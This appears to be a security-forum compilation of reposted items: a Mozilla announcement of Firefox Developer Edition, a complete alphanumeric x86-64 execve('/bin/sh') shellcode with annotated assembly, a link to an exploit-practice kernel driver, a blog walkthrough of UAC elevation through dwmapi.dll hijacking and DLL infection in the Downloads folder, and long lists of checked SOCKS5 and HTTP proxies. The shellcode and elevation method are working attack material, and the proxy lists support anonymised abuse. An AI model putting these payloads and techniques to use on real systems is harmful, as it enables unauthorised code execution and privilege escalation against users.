Nytro

Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition on November 10, 2014 by Dave Camp Developers are critical to the continued success of the Web. The content and apps they create compel us to come back to the Web every day, whether on a computer or mobile phone. In celebration of the 10th anniversary of Firefox, we’re excited to unveil Firefox Developer Edition, the first browser created specifically for developers. Ten years ago, we built Firefox for early adopters and developers to give them more choice and control. Firefox integrated WebAPIs and Add-ons to enable people to get the most out of the Web. Now we’re giving developers the whole browser as a hard-hat area, allowing us to bring front and center the features most relevant to them. Having a dedicated developer browser means we can tailor the browsing experience to what developers do every day. Because Firefox is part of an open-source, independent community and not part of a proprietary ecosystem, we’re able to offer features other browsers can’t by applying our tools everywhere the Web goes, regardless of platform or device. One of the biggest pain points for developers is having to use numerous siloed development environments in order to create engaging content or for targeting different app stores. For these reasons, developers often end up having to bounce between different platforms and browsers, which decreases productivity and causes frustration. Firefox Developer Edition solves this problem by creating a focal point to streamline your development workflow. It’s a stable developer browser which is not only a powerful authoring tool but also robust enough for everyday browsing. It also adds new features that simplify the process of building for the entire Web, whether targeting mobile or desktop across many different platforms. If you’re an experienced developer, you’ll already be familiar with the installed tools so you can focus on developing your content or app as soon as you open the browser. There’s no need to download additional plugins or applications to debug mobile devices. If you’re a new Web developer, the streamlined workflow and the fact that everything is already set up and ready to go makes it easier to get started building sophisticated applications. So what’s under the hood? The first thing you’ll notice is the distinctive dark design running through the browser. We applied the developer tools theme to the entire browser. It’s trim and sharp and focused on saving space for the content on your screen. It also fits in with the darker look common among creative app development tools. We’ve also integrated two powerful new features, Valence and WebIDE that improve workflow and help you debug other browsers and apps directly from within Firefox Developer Edition. Valence (previously called Firefox Tools Adapter) lets you develop and debug your app across multiple browsers and devices by connecting the Firefox dev tools to other major browser engines. Valence also extends the awesome tools we’ve built to debug Firefox OS and Firefox for Android to the other major mobile browsers including Chrome on Android and Safari on iOS. So far these tools include our Inspector, Debugger and Console and Style Editor. WebIDE allows you to develop, deploy and debug Web apps directly in your browser, or on a Firefox OS device. It lets you create a new Firefox OS app (which is just a web app) from a template, or open up the code of an existing app. From there you can edit the app’s files. It’s one click to run the app in a simulator and one more to debug it with the developer tools. Firefox Developer Edition also includes all the tools experienced Web developers are familiar with, including: Responsive Design Mode – see how your website or Web app will look on different screen sizes without changing the size of your browser window. Page Inspector- examine the HTML and CSS of any Web page and easily modify the structure and layout of a page. Web Console – see logged information associated with a Web page and use Web Console and interact with a Web page using JavaScript. JavaScript Debugger – step through JavaScript code and examine or modify its state to help track down bugs. Network Monitor – see all the network requests your browser makes, how long each request takes and details of each request. Style Editor – view and edit CSS styles associated with a Web page, create new ones and apply existing CSS stylesheets to any page. Web Audio Editor – inspect and interact with Web Audio API in real time to ensure that all audio nodes are connected in the way you expect. Give it a try and let us know what you think. We’re keen to hear your feedback. More Information: Download Firefox Developer Edition Release Notes Sursa: https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/

[h=1]Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)[/h] #Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) #Author: Breaking.Technology #Date: 06 November 2014 #Vendor Homepage: http://breaking.technology #Version: x86-64 platforms #Classification: 64 bit shellcode #Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt # Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) # This shellcode will successfully execute every time as long as it is returned to. # (c) 2014 Breaking Technology, Inc. # http://breaking.technology/ # # Assembled (87 bytes): # XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V # # Assembly: # user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o .section .data .section .text .globl _start _start: # "XX" pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer prepare_ff: # "j0TYX45Pk13" push $0x30 # 'j0' push %rsp # 'T' pop %rcx # 'Y' %rcx points to $0x30 pop %rax # 'X' %rax = 0x30 xor $0x35, %al # '45' %rax = 0x05 push %rax # 'P' (%rcx) = 0x05 imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff prepare_f8: # "VX4047" # mov %rsi, %rax push %rsi # 'V' pop %rax # 'X' %rax = %rsi = 0x000000ff # mov $0xf8, %al xor $0x30, %al # '40' xor $0x37, %al # '47' %rax = 0x000000f8 write_negative_8: # "3At1At1qu1qv1qw" # mov %eax, 0x74(%rcx) xor 0x74(%rcx), %eax # '3At' xor %eax, 0x74(%rcx) # '1At' 0xf8 # mov %sil, 0x75 - 0x77 + rcx xor %esi, 0x75(%rcx) # '1qu' 0xff xor %esi, 0x76(%rcx) # '1qv' 0xff xor %esi, 0x77(%rcx) # '1qw' 0xff # -8 is now on the stack as a 32-bit dword # at 0x74(%rcx) read_negative_8: # "Hcyt" # move long (dword) to signed quadword # mov -8, %rdi movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 ) get_return_pointer: # "14yH34y" # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi # OR IN DECIMAL: # mov -16(%rcx), %rsi xor %esi, (%rcx, %rdi, 2) # '14y' xor (%rcx, %rdi, 2), %rsi # 'H34y' prepare_key: # "hj5XVX" # put the xor key into %eax push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. pop %rax # 'X' decode_encoded_code: # "1FK" xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded decode_encoded_data: # "1FSH3FO" xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax begin_stack_setup: # "PT" push %rax # 'P' push "/bin/sh\0" push %rsp # 'T' push pointer to /bin/sh zero_rax: # "j0X40" # xor %rax, %rax push $0x30 # 'j0' pop %rax # 'X' xor $0x30, %al # '40' %rax is NULL end_stack_setup: # "PP" push %rax # 'P' push NULL push %rax # 'P' push NULL mov_3b_al: # "4u4N" # mov $0x3b, %al xor $0x75, %al # '4u' xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b # this is for syscall ^ begin_stack_run: # "Z" pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL encoded_code: # "4jWS" # 0x34 0x6a 0x57 0x53 # AFTER XOR MAGIC: .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" .byte 0x57 # "\x0f" .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); # syscall(%rax) = function(%rdi,%rsi,%rdx); # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); encoded_data: # "EW18EF0V" turns into "/bin/sh\0" # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 # AFTER XOR MAGIC: .byte 0x45 # / .byte 0x57 # b .byte 0x31 # i .byte 0x38 # n .byte 0x45 # / .byte 0x46 # s .byte 0x30 # h .byte 0x56 # \0 Sursa: http://www.exploit-db.com/exploits/35205/

[h=1]KdExploitMe[/h] A kernel driver to practice writing exploits against, as well as some example exploits using public techniques. Sursa: https://github.com/clymb3r/KdExploitMe

[h=3]Passive UAC Elevation[/h] I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll. [h=2]LoadLibrary[/h] This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file: The system will first check the KnownDlls registry key for the path, if it's not found there, then the system will the look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64. If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; However, the dll must meet the following criteria. The application must load the dll by its name and not the full path (this is common). The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs. The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa). The dll should exist in system32 or syswow64, special paths don't appear to work. ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Is it a real flash update? Is it just ZeroAccess? Nobody know.[/TD] [/TR] [/TABLE] [h=2]A Less Invasive Method[/h] What if there was a folder where 90% of the applications that require UAC elevation reside and what if it was writable from a non-elevated process? Well it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherload: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll, however this is a fairly easy fix: dll infection. [h=2]Writing a DLL Infector[/h] My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disable and overwrite the bound imports directory with the new section header, append the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section. All we need now is some code for the section. [h=2]The Shellcode[/h] The obvious choice was the make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros, I'll quickly run over how it works. Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll. Usess a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA. Opens the current process token and queries it to confirm the application we are running from is UAC elevated. Gets the path of cmd.exe then executes it (UAC elevated of course). Passes execution back to the real dwmapi.dll entry point so execution can continue. [h=2]Putting It All Together[/h] The final product infects dwmapi.dll with our shellcode and places it in the download folder, once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned ( Because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit windows). I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator Posted by TM at 11:03 AM Sursa: MalwareTech: Passive UAC Elevation

[h=1]08-11-14 | VIP Socks 5 (62)[/h] [LIST=1]08-11-14 | VIP Socks 5 (62) Checked & filtered Socks5: 107.185.202.211:47603 108.162.40.186:52707 109.201.254.216:27976 122.221.158.15:31978 135.19.61.219:19291 142.196.192.133:18215 173.163.56.233:36847 173.217.23.79:41406 174.1.13.143:32726 174.55.203.55:26215 174.60.73.244:37761 180.64.68.40:443 184.166.178.229:30957 184.68.38.126:16444 194.44.175.41:1081 194.44.175.49:1081 198.27.67.24:53193 198.50.206.1:443 199.201.126.163:443 201.211.174.68:17195 202.154.102.12:20669 205.144.214.26:17232 216.171.240.92:1053 216.240.53.99:29059 222.114.148.54:443 23.106.90.230:11973 24.15.203.60:28655 24.192.152.155:15975 24.210.225.114:10557 24.49.210.53:48659 24.51.216.43:51039 24.59.45.242:15310 24.93.123.61:23183 31.129.91.129:33335 47.22.36.178:32754 5.11.76.183:36209 61.147.67.2:9123 66.168.209.178:20700 67.183.10.14:5105 68.225.150.49:7733 69.116.206.228:33198 70.126.76.45:32973 70.33.46.92:52784 70.64.144.216:46069 71.225.92.117:37467 71.9.127.141:36820 72.192.18.107:46478 74.132.8.66:29734 75.71.170.182:33683 75.84.52.36:43440 76.173.39.152:53356 78.237.248.24:17909 78.39.178.2:443 80.46.160.219:25712 80.47.184.124:49168 85.30.233.152:4013 89.44.109.160:13135 92.240.248.75:443 96.29.132.66:18433 96.3.48.98:24257 98.235.80.130:22831 99.229.170.129:41438 [/LIST] Sursa: 08-11-14 | VIP Socks 5 (62) - Pastebin.com

08-11-14 | Fast Proxy Server List (1655) [LIST=1]08-11-14 | Fast Proxy Server List (1655) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.160.80.14:8088 1.161.212.57:80 1.161.212.57:8080 1.164.212.237:8088 1.164.227.161:8088 1.168.89.87:8088 1.171.1.145:9064 1.172.2.142:9064 1.179.147.2:8080 1.192.116.28:8585 101.251.238.123:8080 101.69.168.210:9000 101.69.168.211:9000 101.79.246.16:8080 101.79.246.6:8080 103.16.114.11:3128 103.21.184.209:9064 103.246.244.161:44338 103.249.181.5:3128 103.25.155.51:8080 103.25.203.227:7808 103.25.203.227:8089 103.25.7.51:9064 103.254.126.38:80 103.254.126.38:8080 103.255.121.195:80 103.28.158.41:9064 103.28.255.90:9064 103.31.133.226:3128 103.4.167.186:80 106.3.40.249:8081 106.37.177.251:3128 107.150.224.29:80 107.150.224.29:8080 107.170.206.99:80 108.165.33.11:3128 108.165.33.3:3128 108.165.33.4:3128 108.165.33.7:3128 108.165.33.9:3128 108.47.12.2:8081 109.120.150.87:3128 109.228.25.136:80 109.251.10.3:8080 109.73.170.248:80 110.153.9.250:80 110.252.17.176:8585 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.54.224.226:8080 110.77.197.156:3128 110.77.212.109:8080 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:8085 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8080 111.1.32.24:8088 111.1.32.24:81 111.1.32.24:8123 111.1.32.24:9064 111.1.32.24:9999 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.163:81 111.1.36.164:80 111.1.36.164:83 111.1.36.164:84 111.1.36.164:85 111.1.36.164:86 111.1.36.165:80 111.1.36.165:81 111.1.36.165:83 111.1.36.2:80 111.1.36.21:80 111.1.36.21:81 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.21:86 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:82 111.1.36.23:83 111.1.36.23:85 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:84 111.1.36.25:85 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:82 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.10.10.25:8123 111.10.100.152:8123 111.10.100.206:8123 111.10.100.229:8123 111.10.103.231:8123 111.10.103.8:8123 111.10.108.200:8123 111.10.108.89:8123 111.10.112.131:8123 111.10.113.41:8123 111.10.113.81:8123 111.10.114.109:8123 111.10.115.68:8123 111.10.116.124:8123 111.10.116.183:8123 111.10.116.254:8123 111.10.117.84:8123 111.10.118.13:8123 111.10.118.159:8123 111.10.118.97:8123 111.10.128.199:8123 111.10.129.83:8123 111.10.130.176:8123 111.10.136.193:8123 111.10.137.169:8123 111.10.138.190:8123 111.10.139.154:8123 111.10.139.3:8123 111.10.14.153:8123 111.10.144.188:8123 111.10.145.59:8123 111.10.147.224:8123 111.10.15.14:8123 111.10.153.171:8123 111.10.155.159:8123 111.10.156.35:8123 111.10.160.198:8123 111.10.160.72:8123 111.10.163.89:8123 111.10.165.125:8123 111.10.165.155:8123 111.10.166.130:8123 111.10.166.209:8123 111.10.167.246:8123 111.10.167.48:8123 111.10.167.90:8123 111.10.177.223:8123 111.10.178.246:8123 111.10.182.230:8123 111.10.189.17:8123 111.10.198.100:8123 111.10.83.93:8123 111.11.184.10:80 111.11.184.103:80 111.11.184.116:80 111.11.184.12:80 111.11.184.13:80 111.11.184.14:80 111.11.184.20:80 111.11.184.36:80 111.11.184.37:80 111.11.184.43:80 111.11.184.44:80 111.11.184.7:80 111.11.184.79:80 111.11.184.81:80 111.11.184.82:80 111.11.184.83:80 111.11.184.84:80 111.11.184.85:80 111.11.184.9:80 111.11.228.81:80 111.12.128.167:80 111.12.128.171:80 111.12.128.172:80 111.13.109.51:80 111.13.109.52:80 111.13.109.53:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.161.126.98:80 111.161.126.99:80 111.199.154.85:3128 111.206.81.248:80 111.221.1.254:8080 111.240.197.179:8088 111.240.97.94:9064 111.249.157.35:3128 111.249.95.80:9064 111.250.189.156:9064 111.250.233.6:3128 111.251.232.188:8088 111.252.249.231:8088 111.252.32.180:8088 111.254.142.200:8088 111.254.181.19:8088 111.254.45.161:9064 111.254.59.13:8088 111.3.82.148:8123 111.68.121.141:8080 111.7.129.140:80 111.7.129.140:8088 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8088 111.7.129.151:80 111.7.129.151:8086 111.7.129.151:8088 111.7.129.160:80 111.7.129.162:80 111.8.20.136:80 111.8.20.141:80 111.9.124.150:8123 111.9.232.47:8123 111.9.233.113:8123 111.9.234.167:8123 111.9.234.193:8123 111.9.86.91:8123 111.93.234.98:3128 112.0.156.206:8123 112.1.184.23:8123 112.104.113.161:8088 112.105.215.77:8088 112.15.18.195:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.165.199:8123 112.18.166.52:8123 112.18.171.122:8123 112.18.173.110:8123 112.18.174.31:8123 112.18.174.44:8123 112.18.176.104:8123 112.18.179.49:8123 112.18.196.121:8123 112.18.197.25:8123 112.18.21.195:8123 112.18.28.19:8123 112.18.52.252:8123 112.18.64.138:8123 112.18.72.137:8123 112.18.75.133:8123 112.18.88.48:8123 112.20.105.244:8123 112.20.122.50:8123 112.20.124.199:8123 112.20.148.163:8123 112.21.232.53:8123 112.22.126.72:8123 112.22.225.5:8123 112.22.228.9:8123 112.236.157.53:8585 112.24.124.157:8123 112.248.244.7:8585 112.25.43.3:3128 112.25.43.3:80 112.3.202.185:8123 112.44.229.135:8123 112.44.233.136:8123 112.44.247.170:8123 112.44.247.4:8123 112.5.16.50:80 112.65.18.17:8080 112.65.19.122:8080 112.65.212.74:3128 112.65.44.67:3128 112.91.208.78:9999 113.105.224.79:80 113.105.224.85:80 113.105.93.79:80 113.105.93.80:80 113.107.57.76:80 113.15.164.62:9999 113.162.133.235:80 113.19.87.107:8080 113.197.80.253:8080 113.200.220.151:8123 113.200.68.26:9000 113.201.63.12:80 113.214.13.1:8000 113.4.10.26:8118 113.53.249.131:8080 113.57.230.49:81 114.112.192.195:3128 114.231.23.140:8585 114.24.116.237:8088 114.24.172.68:8088 114.24.19.129:8088 114.24.4.19:8088 114.241.192.8:8585 114.247.120.114:3128 114.255.183.163:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.241.175:9064 114.27.126.120:8088 114.27.126.49:8088 114.27.18.90:8088 114.27.5.18:9064 114.27.79.210:8088 114.36.6.48:9064 114.37.20.206:9064 114.37.26.213:8088 114.37.44.121:8088 114.38.196.145:8088 114.38.230.187:8088 114.38.36.200:8088 114.38.89.72:8088 114.39.187.196:8088 114.39.250.91:8088 114.40.110.122:9064 114.40.111.61:8088 114.40.205.50:9064 114.43.45.139:8088 114.44.0.98:8088 114.46.137.195:9064 114.66.229.2:80 114.79.135.42:9064 115.124.74.178:8080 115.236.59.194:3128 115.239.248.235:8080 116.228.55.217:8003 117.135.250.62:80 117.135.252.2:80 117.136.165.129:8123 117.139.28.168:8123 117.139.28.217:8123 117.139.39.75:8123 117.139.44.192:8123 117.139.47.69:8123 117.139.63.57:8123 117.139.65.237:8123 117.146.116.67:80 117.146.116.68:80 117.146.116.69:80 117.147.192.81:8123 117.147.195.68:8123 117.147.224.35:8123 117.147.246.181:8123 117.149.199.30:8123 117.149.218.110:8123 117.149.224.26:8123 117.149.234.93:8123 117.158.1.210:9999 117.162.124.188:8123 117.162.164.138:8123 117.162.168.201:8123 117.162.171.179:8123 117.162.173.237:8123 117.162.174.251:8123 117.162.193.126:8123 117.162.195.173:8123 117.162.201.77:8123 117.162.204.120:8123 117.162.216.173:8123 117.162.233.65:8123 117.162.238.139:8123 117.162.247.203:8123 117.162.70.148:8123 117.162.74.225:8123 117.162.80.48:8123 117.162.83.114:8123 117.162.84.146:8123 117.162.95.159:8123 117.163.109.69:8123 117.163.115.144:8123 117.163.119.129:8123 117.163.197.64:8123 117.163.202.212:8123 117.163.214.238:8123 117.163.216.119:8123 117.164.13.77:8123 117.164.151.112:8123 117.164.156.165:8123 117.164.157.188:8123 117.164.157.60:8123 117.164.158.249:8123 117.164.173.89:8123 117.164.205.150:8123 117.164.222.244:8123 117.164.28.112:8123 117.164.39.190:8123 117.164.58.11:8123 117.166.23.119:8123 117.166.237.137:8123 117.166.243.176:8123 117.166.41.70:8123 117.166.46.233:8123 117.166.74.162:8123 117.166.95.188:8123 117.166.96.26:8123 117.167.100.247:8123 117.169.207.95:8123 117.170.220.6:8123 117.170.222.231:8123 117.170.226.23:8123 117.170.230.73:8123 117.170.231.15:8123 117.170.231.18:8123 117.170.231.204:8123 117.170.242.116:8123 117.170.242.40:8123 117.170.4.99:8123 117.170.5.153:8123 117.170.5.177:8123 117.170.59.122:8123 117.170.7.95:8123 117.171.103.30:8123 117.171.124.96:8123 117.171.137.177:8123 117.171.162.167:8123 117.171.228.250:8123 117.171.231.2:8123 117.171.235.178:8123 117.171.235.205:8123 117.171.238.250:8123 117.171.26.6:8123 117.171.55.210:8123 117.171.64.214:8123 117.171.67.245:8123 117.173.20.220:8123 117.173.20.247:8123 117.173.20.32:8123 117.173.20.55:8123 117.173.245.229:8123 117.173.249.166:8123 117.173.254.165:8123 117.173.61.251:8123 117.174.1.198:8123 117.174.173.94:8123 117.174.195.207:8123 117.174.198.147:8123 117.174.200.136:8123 117.174.201.108:8123 117.174.209.27:8123 117.174.211.77:8123 117.174.223.247:8123 117.174.227.101:8123 117.174.228.204:8123 117.175.196.170:8123 117.175.212.88:8123 117.175.228.199:8123 117.175.229.134:8123 117.175.229.179:8123 117.175.229.75:8123 117.175.230.180:8123 117.175.241.196:8123 117.175.32.47:8123 117.176.185.24:8123 117.21.192.7:80 117.58.241.15:8080 117.59.217.240:80 117.59.217.240:81 117.59.217.240:82 117.59.217.240:83 118.95.177.186:9064 118.97.172.58:80 118.97.191.206:8080 118.97.66.4:8080 118.97.95.182:8080 118.99.85.7:8080 119.110.71.126:8080 119.254.76.225:808 119.4.115.51:8090 119.4.95.135:80 119.4.95.136:80 119.40.97.2:8080 119.48.23.15:9999 119.6.136.126:80 119.6.136.126:81 119.97.146.152:80 12.167.84.237:8080 120.194.107.149:9999 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8080 120.198.243.115:8888 120.198.243.116:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.52:80 120.198.243.78:80 120.198.243.78:81 120.198.243.79:80 120.198.243.82:80 120.198.243.86:80 120.202.249.230:80 120.203.124.188:8123 120.203.151.29:8123 120.203.154.49:8123 120.203.158.99:8123 120.203.166.88:8123 120.203.173.68:8123 120.203.175.136:8123 120.203.214.144:80 120.203.214.144:81 120.203.214.144:82 120.203.214.144:83 120.203.214.144:84 120.203.214.147:80 120.203.214.147:81 120.203.214.147:82 120.203.214.147:83 120.203.214.147:84 120.203.214.151:80 120.203.214.183:80 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.231.212:8123 120.203.232.192:8123 120.203.233.58:8123 120.206.109.21:8123 120.206.111.16:8123 120.206.112.25:8123 120.206.132.22:8123 120.206.132.41:8123 120.206.134.111:8123 120.206.139.70:8123 120.206.140.18:8123 120.206.140.49:8123 120.206.143.237:8123 120.206.143.30:8123 120.206.145.72:8123 120.206.147.125:8123 120.206.176.243:8123 120.206.194.66:8123 120.206.79.218:8123 122.156.137.188:8585 122.227.199.178:9999 122.254.25.136:9064 122.96.59.103:83 122.96.59.103:843 122.96.59.105:80 122.96.59.105:81 122.96.59.105:82 122.96.59.106:82 123.119.164.102:9000 123.150.207.105:80 123.177.20.220:80 123.195.188.190:9064 124.123.244.15:9064 124.123.42.135:9064 124.206.241.221:3128 124.240.187.79:82 124.240.187.79:83 124.240.187.80:80 124.240.187.81:83 124.6.135.170:3128 124.82.27.236:8080 124.88.67.19:80 125.164.125.239:3128 125.209.116.29:8080 125.212.193.2:3128 125.212.216.85:80 125.24.77.62:80 125.24.77.91:8080 125.24.78.154:80 125.24.78.223:8080 125.24.78.98:80 125.24.78.98:8080 125.24.79.234:80 125.24.79.235:8080 125.33.113.49:3128 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.75:80 125.39.66.75:8080 125.39.66.76:80 125.39.66.76:8080 125.42.176.208:9999 125.88.162.20:9999 125.88.255.143:80 125.88.255.144:80 125.89.74.233:3128 125.89.74.239:3128 125.89.74.240:3128 128.199.224.118:8080 130.0.25.162:8080 130.14.29.110:80 130.14.29.111:80 130.14.29.120:80 130.185.81.141:3128 131.155.186.8:3128 131.72.105.1:8080 133.18.6.22:80 139.193.62.12:8080 14.114.244.161:9999 14.136.79.252:9064 14.167.9.111:80 14.18.16.71:80 14.18.237.150:8085 140.109.57.11:9590 140.112.214.1:9064 140.113.156.111:9064 140.113.241.221:9064 140.116.88.78:8888 140.119.137.22:9064 140.121.197.169:8080 140.123.122.211:9064 140.129.1.183:3128 140.134.140.57:9064 140.206.86.70:8080 141.85.204.71:1920 146.148.66.106:80 146.185.149.184:3128 149.255.255.242:80 149.255.255.250:80 152.26.69.36:8080 152.26.69.37:8080 154.65.4.90:8080 158.58.172.207:13374 158.58.172.207:14826 158.58.172.207:15692 158.58.172.207:19279 158.58.172.207:33919 158.58.172.207:33948 158.58.172.207:33965 158.58.172.207:34015 158.58.172.207:80 159.255.167.147:8080 162.208.49.45:7808 162.208.49.45:8089 162.243.205.210:3128 163.125.206.206:9999 163.177.79.4:80 163.177.79.5:80 163.28.10.162:8888 163.53.187.98:8080 168.63.255.195:8080 171.12.3.71:81 173.201.185.40:80 175.101.16.72:80 175.101.16.72:8080 175.138.194.103:8080 175.184.250.18:8080 175.99.126.38:80 176.241.83.173:8080 176.73.252.139:3128 176.99.6.237:3128 177.104.25.130:3128 177.124.62.106:3128 177.130.92.69:3128 177.17.167.18:8080 177.200.82.234:8080 177.207.112.140:8080 177.22.111.120:8080 177.223.0.213:8080 177.54.192.163:8080 177.64.93.97:3128 177.67.100.82:8080 177.75.42.33:8080 177.80.18.115:3128 177.99.164.171:8080 177.99.74.182:8080 178.124.157.187:8080 178.137.138.96:8080 178.18.25.151:8888 178.219.248.15:8080 178.254.153.158:8080 178.32.72.26:8089 178.74.68.74:8080 178.77.243.110:443 179.154.253.192:3128 180.109.8.115:8585 180.174.62.185:80 180.176.102.224:9064 180.177.222.51:8088 180.183.25.223:3128 180.183.250.69:8080 180.183.51.139:3128 180.218.44.226:9064 180.242.40.184:8080 180.250.172.182:8080 180.250.215.251:8080 180.250.43.88:8080 180.250.44.250:80 181.208.104.156:9064 181.225.58.104:9064 181.49.15.162:3128 181.72.4.115:9064 181.73.26.240:9064 182.118.23.7:8081 182.18.161.71:3128 182.235.110.89:8088 182.235.133.197:8088 182.235.169.169:9064 182.235.222.142:9064 182.239.127.137:80 182.239.127.140:80 182.239.95.134:80 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.254.178.190:3128 182.254.212.164:80 182.254.221.192:8080 182.30.3.169:8080 182.36.82.12:8585 182.48.116.51:8080 182.52.49.157:80 182.70.37.75:3128 183.203.12.166:80 183.203.22.68:80 183.203.22.81:80 183.203.22.87:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.23.18:80 183.203.8.147:8080 183.203.8.148:8080 183.206.87.177:8123 183.207.224.13:80 183.207.224.14:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.49:81 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:80 183.207.224.52:81 183.207.229.12:80 183.207.229.12:8000 183.207.229.13:80 183.207.229.13:9000 183.207.229.139:80 183.207.229.194:80 183.207.229.195:80 183.207.229.199:80 183.207.229.202:80 183.207.229.203:80 183.207.237.11:80 183.207.237.18:80 183.207.237.18:81 183.207.237.21:80 183.208.196.120:8123 183.208.197.72:8123 183.208.200.131:8123 183.208.201.107:8123 183.208.213.193:8123 183.208.214.53:8123 183.208.222.149:8123 183.208.222.53:8123 